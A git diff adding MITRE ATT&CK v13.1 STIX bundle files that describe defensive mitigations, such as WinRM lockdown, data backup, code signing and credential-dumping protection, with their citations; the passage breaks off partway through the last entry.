0000000000000000000000000000000000000000..36357ff7682688ada051c23ccc4447a40f626220 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--cefa01b5-494f-4ba2-95b7-c32c3dbc0ece", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1028", + "url": "https://attack.mitre.org/mitigations/T1028", + "source_name": "mitre-attack" + }, + { + "source_name": "NSA Spotting", + "description": "National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.", + "url": "https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm" + } + ], + "modified": "2020-01-17T16:46:19.274Z", + "name": "Windows Remote Management Mitigation", + "description": "Disable the WinRM service. If the service is necessary, lock down critical enclaves with separate WinRM infrastructure, accounts, and permissions. Follow WinRM best practices on configuration of authentication methods and use of host firewalls to restrict WinRM access to allow communication only to/from specific devices. (Citation: NSA Spotting)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b.json new file mode 100644 index 0000000000000000000000000000000000000000..b5099881efa2299bcfc46bfbeb4fcc1343f21619 
--- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--629de3a4-d157-425b-a91d-e815c0092259", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b", + "type": "course-of-action", + "created": "2019-07-19T14:33:33.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1053", + "url": "https://attack.mitre.org/mitigations/M1053" + } + ], + "modified": "2020-03-31T13:11:28.201Z", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7.json new file mode 100644 index 0000000000000000000000000000000000000000..c422437f221058305399fca017b0cd4bfc8564fa --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--3490f272-364b-4835-b3f3-cf78b1b6e048", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1160", + "external_id": "T1160" + } + ], + "modified": "2019-07-24T19:48:23.825Z", + "name": "Launch Daemon Mitigation", + "description": "Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f.json new file mode 100644 index 0000000000000000000000000000000000000000..4ce68e66e0a106ce9feee39c8b02e380457c3e30 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--96656416-b6db-45b4-82af-a39b87bbe55b", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1200", + "external_id": "T1200" + }, + { + "url": "https://en.wikipedia.org/wiki/IEEE_802.1X", + "description": "Wikipedia. (2018, March 30). IEEE 802.1X. Retrieved April 11, 2018.", + "source_name": "Wikipedia 802.1x" + } + ], + "modified": "2019-07-24T19:35:08.161Z", + "name": "Hardware Additions Mitigation", + "description": "Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems. \n\nBlock unknown devices and accessories by endpoint security configuration and monitoring agent.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--62ae52c9-7197-4f5b-be1d-10d2e1df2c96.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--62ae52c9-7197-4f5b-be1d-10d2e1df2c96.json new file mode 100644 index 0000000000000000000000000000000000000000..cb9bb1ea3aa5036b4bf386690a29435e4090cb05 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--62ae52c9-7197-4f5b-be1d-10d2e1df2c96.json 
@@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--2964bd62-8969-4028-9fa2-00354c651fca", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--62ae52c9-7197-4f5b-be1d-10d2e1df2c96", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1172", + "external_id": "T1172" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", + "description": "Matthew Dunwoody. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved November 20, 2017.", + "source_name": "FireEye APT29 Domain Fronting With TOR March 2017" + }, + { + "url": "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "description": "Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016.", + "source_name": "Mandiant No Easy Breach" + } + ], + "modified": "2019-07-24T19:12:36.946Z", + "name": "Domain Fronting Mitigation", + "description": "If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.\n\nIn order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems. (Citation: FireEye APT29 Domain Fronting With TOR March 2017) (Citation: Mandiant No Easy Breach) It may be possible to detect or prevent the installation of these tools with Host-based solutions.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1.json new file mode 100644 index 0000000000000000000000000000000000000000..2749ec005dc50825138c3c36e8dc20d0a88c9beb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--fe4830cd-28de-417d-8324-e7331fbdee5c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1", + "type": "course-of-action", + "created": "2019-06-06T21:08:58.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1025", + "url": "https://attack.mitre.org/mitigations/M1025" + } + ], + "modified": "2020-05-20T13:13:48.900Z", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf.json new file mode 100644 index 0000000000000000000000000000000000000000..7a631a57e5e07cfc27b92c7fb524930851fe1a23 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--b360a288-c773-45e1-8405-d9ca684ca6d2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1179", + "external_id": "T1179" + } + ], + "modified": "2019-07-24T19:37:27.850Z", + "name": "Hooking Mitigation", + "description": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--82fbc58b-171d-4a2d-9a20-c6b2a716bd08.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--82fbc58b-171d-4a2d-9a20-c6b2a716bd08.json new file mode 100644 index 0000000000000000000000000000000000000000..1b9250689998ee47fa067d003bb1d55e98721e0f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--82fbc58b-171d-4a2d-9a20-c6b2a716bd08.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--83499b19-9080-449c-b057-f472ce795524", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--82fbc58b-171d-4a2d-9a20-c6b2a716bd08", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1116", + "url": "https://attack.mitre.org/mitigations/T1116", + "source_name": "mitre-attack" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "TechNet Trusted Publishers", + "description": "Microsoft. (n.d.). Manage Trusted Publishers. Retrieved March 31, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc733026.aspx" + }, + { + "source_name": "Securelist Digital Certificates", + "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", + "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/" + } + ], + "modified": "2020-01-17T16:45:23.319Z", + "name": "Code Signing Mitigation", + "description": "Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system. 
(Citation: NSA MS AppLocker) (Citation: TechNet Trusted Publishers) (Citation: Securelist Digital Certificates)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da.json new file mode 100644 index 0000000000000000000000000000000000000000..082b7d44970b081083c0acc49d31f49074dbb947 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--af7c2ee7-0415-49ea-b636-f04db698ab84", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1006", + "url": "https://attack.mitre.org/mitigations/T1006", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:19.208Z", + "name": "File System Logical Offsets Mitigation", + "description": "Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719.json new file mode 100644 index 0000000000000000000000000000000000000000..18c86380285cc8037c87e2f086fd219446a1a3f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--e9fa4da9-3fa6-45c6-8408-730e85641b06", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--94927849-03e3-4a07-8f4c-9ee21b626719", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1165", + "external_id": "T1165" + } + ], + "modified": "2019-07-25T12:01:55.766Z", + "name": "Startup Items Mitigation", + "description": "Since StartupItems are deprecated, preventing all users from writing to the /Library/StartupItems directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can\u2019t be leveraged for privilege escalation.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2.json new file mode 100644 index 0000000000000000000000000000000000000000..514c43287b0e2e8cd1052dbc0fd3cee1f9a22d8a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--087fdd0d-a5a1-4ed3-90b4-9a101c9f6aa2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--9a902722-cecd-4fbe-a6c9-49333aa0f8c2", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1018", + "url": "https://attack.mitre.org/mitigations/T1018", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.921Z", + "name": "Remote System Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad.json new file mode 100644 index 0000000000000000000000000000000000000000..4af6c1d6bbfcf4f33ba8d5c1430de76fb7d0f941 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--23a9f62d-3cf0-4fd8-a052-c6379050eae9", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--a569295c-a093-4db4-9fb4-7105edef85ad", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1024", + "external_id": "T1024" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-24T18:14:14.227Z", + "name": "Custom Cryptographic Protocol Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Since the custom protocol used may not adhere to typical protocol standards, there may be opportunities to signature the traffic on a network level for detection. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--aeff5887-8f9e-48d5-a523-9b395e2ce80a.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--aeff5887-8f9e-48d5-a523-9b395e2ce80a.json new file mode 100644 index 0000000000000000000000000000000000000000..c8e22bc4e0fe77ffbc82593fb9c7102684bcfbbe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--aeff5887-8f9e-48d5-a523-9b395e2ce80a.json 
@@ -0,0 +1,92 @@ +{ + "type": "bundle", + "id": "bundle--3303ebe6-46aa-48fa-93e9-09193a6946a7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--aeff5887-8f9e-48d5-a523-9b395e2ce80a", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1003", + "url": "https://attack.mitre.org/mitigations/T1003", + "source_name": "mitre-attack" + }, + { + "url": "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach", + "description": "Plett, C., Poggemeyer, L. (12, October 26). Securing Privileged Access Reference Material. Retrieved April 25, 2017.", + "source_name": "Microsoft Securing Privileged Access" + }, + { + "source_name": "Microsoft LSA", + "description": "Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved February 13, 2015.", + "url": "https://technet.microsoft.com/en-us/library/dn408187.aspx" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. 
Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "source_name": "Corio 2008" + }, + { + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "source_name": "TechNet Applocker vs SRP" + }, + { + "source_name": "TechNet Credential Guard", + "description": "Lich, B. (2016, May 31). Protect derived domain credentials with Credential Guard. Retrieved June 1, 2016.", + "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard" + }, + { + "source_name": "GitHub SHB Credential Guard", + "description": "NSA IAD. (2017, April 20). Secure Host Baseline - Credential Guard. Retrieved April 25, 2017.", + "url": "https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard" + }, + { + "url": "https://adsecurity.org/?p=1729", + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", + "source_name": "AdSecurity DCSync Sept 2015" + }, + { + "source_name": "Microsoft Replication ACL", + "description": "Microsoft. (n.d.). How to grant the \"Replicating Directory Changes\" permission for the Microsoft Metadirectory Services ADMA service account. 
Retrieved December 4, 2017.", + "url": "https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr" + }, + { + "source_name": "Microsoft Disable NTLM Nov 2012", + "description": "Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.", + "url": "https://technet.microsoft.com/library/jj865668.aspx" + } + ], + "modified": "2021-08-23T20:25:19.916Z", + "name": "Credential Dumping Mitigation", + "description": "### Windows\nMonitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [Valid Accounts](https://attack.mitre.org/techniques/T1078) if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)\n\nOn Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA. (Citation: Microsoft LSA)\n\nIdentify and block potentially malicious software that may be used to dump credentials by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)\n\nWith Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that 